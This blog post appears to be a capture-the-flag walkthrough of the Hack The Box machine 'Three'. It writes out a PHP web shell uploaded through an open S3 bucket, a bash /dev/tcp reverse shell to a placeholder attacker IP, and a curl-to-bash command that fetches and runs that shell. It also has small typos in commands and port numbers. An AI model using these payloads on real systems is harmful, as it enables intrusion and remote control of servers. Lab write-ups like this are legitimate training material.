top of page
Search

Three

  • Admin
  • Aug 1, 2023
  • 2 min read

Updated: Apr 29, 2024

As usual let's start with nmap

map -sV -sC targetIp
ree

Let's add the target Ip in the /etc/hosts file

cd /etc
sudo nano hosts

We found port 80 is open. So let's check the website:

ree

Now let's use gobuster to enumerate any subdomains

gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb --append-domain
ree

we found s3.thetoppers.htb


ree

Let's add s3.thetoppers.htb in the /etc/hosts file too


We can interact with the S3 bucket using awscli


sudo apt install awscli
aws configure

ree

just type "temp" for everything


We can list all of the S3 buckets hosted by the server using ls command

aws --endpoint=http://s3.thehoppers.htb s3 ls
ree

we can use the ls command to list objects and common prefixes under the specified bucket

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

ree

we can see files index.php and .htaccess and a directory called images in the S3 bucket

it looks like apache server is using this s3 bucket as storage


We can use awscli not only to read files using ls but we can also copy files to a remote bucket.


First let's create the shell.php that contains the code below:

<?php system($_GET["cmd"]); ?>

now let's copy shell.php onto the remote bucket using:

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
ree

we have successfully uploaded shell.php onto the bucket


let's go back to our browser and type:

thetoppers.htb/shell.php?cmd=id

ree

this confirms we got code execution on the box


Now, through a reverse shell we will now trigger the victim to connect back to our attacker's machine.


let's get a reverse shell by creating a new file shell.sh containing:

#!/bin/bash
bash -i >& /dev/tcp/<attackerIP>/1337 0>&1

now let's listen on port 1377 using 

nc -lnvp 1337

now we need to host the shell.sh onto our web server


let's create a local web server using:

python3 -m http.server 8000

we can use curl to fetch the shell.sh file from our local host and then pipe it to bash in order to execute it

http://thetoppers.htb/shell.php?cmd=curl%20<attackerip>:8000/shell.sh|bash
ree

let's go back to our netcat listener and we got the shell!

ree

the flag is in the flag.txt file

ree



 
 
 

Recent Posts

See All

Comments

Rated 0 out of 5 stars.
No ratings yet
Add a rating

©2025 by My Tech On IT

bottom of page